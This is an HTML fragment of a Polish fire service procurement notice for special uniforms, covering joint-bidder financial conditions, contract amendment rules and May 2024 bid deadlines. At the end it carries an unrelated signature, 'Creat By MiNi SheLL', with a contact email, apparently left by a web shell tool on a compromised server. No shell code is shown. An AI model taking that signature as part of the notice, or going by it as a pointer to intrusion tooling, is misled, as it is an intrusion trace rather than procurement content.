oświadczenie Wykonawcy. W przypadku<br/> świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne<br/> dokumenty potwierdzające ich należyte wykonanie powinny być wystawione w okresie<br/> ostatnich 3 miesięcy. <br/>informacji z banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej<br/> wysokość posiadanych środków finansowych oraz zdolność kredytową Wykonawcy<br/> w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem na minimalną kwotę<br/> t.j. 500 000 zł lub równowartość tej kwoty wyrażoną w walucie obcej wg średniego<br/> kursu złotego NBP (Tabela A) z dnia publikacji ogłoszenia o zamówieniu w Biuletynie<br/> Zamówień Publicznych przy czym Zamawiający dopuszcza możliwość sumowania<br/> kwoty ubezpieczenia, posiadanych środków finansowych oraz zdolności kredytowej<br/> w celu uzyskania wymaganego minimum w zakresie sytuacji ekonomicznej<br/> i finansowej. Jeżeli natomiast z uzasadnionej przyczyny Wykonawca nie może złożyć<br/> wymaganych przez Zamawiającego podmiotowych środków dowodowych o których<br/> mowa w pkt. 2.4. Wykonawca składa inne podmiotowe środki dowodowe, które <br/> w wystarczający sposób potwierdzą spełnienie opisanego przez Zamawiającego<br/> warunku udziału w postępowaniu dotyczącego sytuacji ekonomicznej lub finansowej. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W tym wypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich <br/> w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu <br/> i zawarcia umowy w sprawie zamówienia publicznego. Wzór pełnomocnictwa został<br/> zawarty w zał. nr 7 do SWZ.<br/>3. Do wykonawców ubiegających się wspólnie o udzielenie zamówienia stosuje się przepisy<br/> o Wykonawcach ubiegających się indywidualnie o udzielenie zamówienia.<br/>4. Warunek dotyczący doświadczenia w należytym wykonaniu lub wykonywaniu dostaw,<br/> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego mogą spełnić,<br/> jeżeli jeden, niektórzy lub wszyscy Wykonawcy wspólnie ubiegający się o udzielenie<br/> zamówienia wykażą należyte wykonanie lub wykonywanie dostaw umundurowania<br/> specjalnego straży pożarnej o łącznej wartości co najmniej 500 000 zł brutto.<br/>5. Warunek dotyczący sytuacji finansowej lub ekonomicznej Wykonawcy wspólnie ubiegający<br/> się o udzielenie zamówienia mogą spełnić w następujący sposób:<br/>5.1. poprzez przedstawienie jednego dokumentu potwierdzającego, że wszyscy Wykonawcy<br/> wspólnie ubiegający się o udzielenie zamówienia są ubezpieczeni od odpowiedzialności<br/> cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia <br/> na minimalna sumę gwarancyjną 500 000 zł albo równowartość tej kwoty wyrażona <br/> w innej walucie wg średniego kursu złotego NBP (Tabela A) z dnia publikacji ogłoszenia<br/> o zamówieniu w Biuletynie Zamówień Publicznych lub odrębnie poprzez przedstawienie<br/> przez jednego, niektórych lub wszystkich wykonawców ubiegających się wspólnie <br/> o udzielenie zamówienia odrębnych dokumentów potwierdzających, że Wykonawcy <br/> ci są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności<br/> związanej z przedmiotem zamówienia, na łączną minimalna kwotę 150 000 zł <br/> lub równowartość tej kwoty wyrażona w innej walucie na zasadach określonych powyżej<br/> albo<br/>5.2. poprzez przedstawienie przez wszystkich, niektórych lub jednego z Wykonawców<br/> ubiegających się wspólnie o udzielenie zamówienia informacji banku lub spółdzielczej<br/> kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków<br/> finansowych lub zdolność kredytową w okresie nie wcześniejszym niż 3 miesiące przed<br/> jej założeniem na łączną minimalna kwotę 500 000 zł lub równowartość wyrażona <br/> w innej walucie wg średniego kursu złotego NBP (Tabela) a z dnia publikacji<br/> ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych;<br/>6.3. Zamawiający dopuszcza również sumowanie potencjałów poszczególnych Wykonawców<br/> wspólnie ubiegających się o udzielenie zamówienia publicznego wynikającego <br/> z posiadanego ubezpieczenia od odpowiedzialności cywilnej, zdolności kredytowej oraz<br/> posiadanych środków finansowych.<br/>7. Warunek niepodlegania wykluczeniu z postępowania każdy z Wykonawców wspólnie<br/> ubiegających się o udzielenie zamówienia spełnia odrębnie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 3.	Dopuszczalne istotne zmiany umowy <br/>3.1. Zgodnie z treścią art. 455 ustawy prawo zamówień publicznych dopuszcza się zmianę postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, jeżeli zmiana dotyczy wykonania dodatkowych elementów poprawiających walory funkcjonalne i bezpieczeństwo ratownika nie mających charakteru istotnych zmian w zatwierdzonej ofercie. Warunkiem dokonania takiej zmiany jest wystąpienie konieczności wykonania prac adaptacyjnych, które zwiększają walory funkcjonalne, ergonomiczne lub estetyczne przedmiotu zamówienia. Ponadto zmiana Wykonawcy ekonomicznie nie byłaby uzasadniona i powodowałaby niedogodność lub zwiększenie kosztów dla Zamawiającego. Wartość zmiany nie może przekroczyć 10 % wartości zamówienia określonej w formularzu ofertowym Wykonawcy. Informacja o konieczności dokonania zmian potwierdzona być musi w protokole, zatwierdzonym pisemnie przez, Zamawiającego. <br/>3.2. W związku z zaistnieniem okoliczności wymienionych w pkt. 3.1. określona <br/>w niniejszej umowie cena, może zostać zmniejszona lub podwyższona. W przypadku podwyższenia ceny umowy jej wysokość każdorazowo powinna być ustalona <br/>z Zamawiającym jednak nie może przekraczać 10 % wartości pierwotnej umowy.<br/> Wykonawca nie może żądać podwyższenia wynagrodzenia, jeżeli wykonał prace <br/>o których mowa w pkt. 3.1. bez uzyskania pisemnej zgody Zamawiającego.<br/>3.3. Wszelkie zmiany zapisów umowy winny być dokonywane w formie pisemnej (aneksu do umowy) pod rygorem ich nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-05-07 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://przetargi.lubelskie.straz.gov.pl/ &gt;JEDNOSTKI,- &gt; KM PSP CHEŁM.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-05-07 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-06-07</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com